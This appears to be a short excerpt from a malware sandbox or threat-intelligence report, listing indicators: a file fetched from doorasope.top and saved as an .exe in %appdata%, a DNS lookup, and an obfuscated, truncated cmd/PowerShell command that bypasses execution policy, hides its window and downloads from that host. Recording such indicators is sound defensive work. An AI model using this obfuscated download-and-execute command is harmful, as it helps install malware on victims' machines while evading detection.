Technical Information
- http://www.doorasope.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWeRSH^E^Ll^.exE -e^xE^cUtI^ONPo^liCy b^Y^pasS ^-NO^p^ROfI^l^E ^-W^INdowStyLe^ ^hI^dDeN (n^eW-ObJeC^t ^s^Ys^tem.NE^T^.^W^ebcL^i^ENT).DOwNLOADfIL^E^('http://www.doorasope.top/...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pOWeRSH^E^Ll^.exE -e^xE^cUtI^ONPo^liCy b^Y^pasS ^-NO^p^ROfI^l^E ^-W^INdowStyLe^ ^hI^dDeN (n^eW-ObJeC^t ^s^Ys^tem.NE^T^.^W^ebcL^i^ENT).DOwNLOADfIL^E^('http://www.doorasope.top/...' (with hidden window)